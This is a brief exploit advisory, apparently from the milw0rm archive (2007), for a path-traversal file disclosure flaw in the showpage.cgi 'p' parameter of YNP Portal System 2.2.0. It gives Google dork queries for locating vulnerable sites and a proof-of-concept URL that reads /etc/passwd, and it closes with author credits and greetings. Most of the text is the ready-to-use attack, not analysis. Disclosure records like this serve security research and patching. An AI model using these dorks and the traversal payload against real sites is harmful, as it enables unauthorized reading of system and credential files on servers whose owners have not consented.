################################################################################# # YNP Portal System 2.2.0 (showpage.cgi p) Remote File Disclosure Vulnerability # # D0RK : inurl:"showpage.cgi?p=popsearch.html" # # : inurl:"showpage.cgi?p=support.html" # # : inurl:"showpage.cgi?p=dialup.html" # # : inurl:"showpage.cgi?p=" # # POC: http://xxxx.com/showpage.cgi?p=../../../../../../etc/passwd # # Discovered by: GolD_M = [Mahmood_ali] # # Thanx To : Tryag-Team & Asbmay's Group & bd0rk & Cold Zero & All My Friends # ################################################################################# # milw0rm.com [2007-08-06]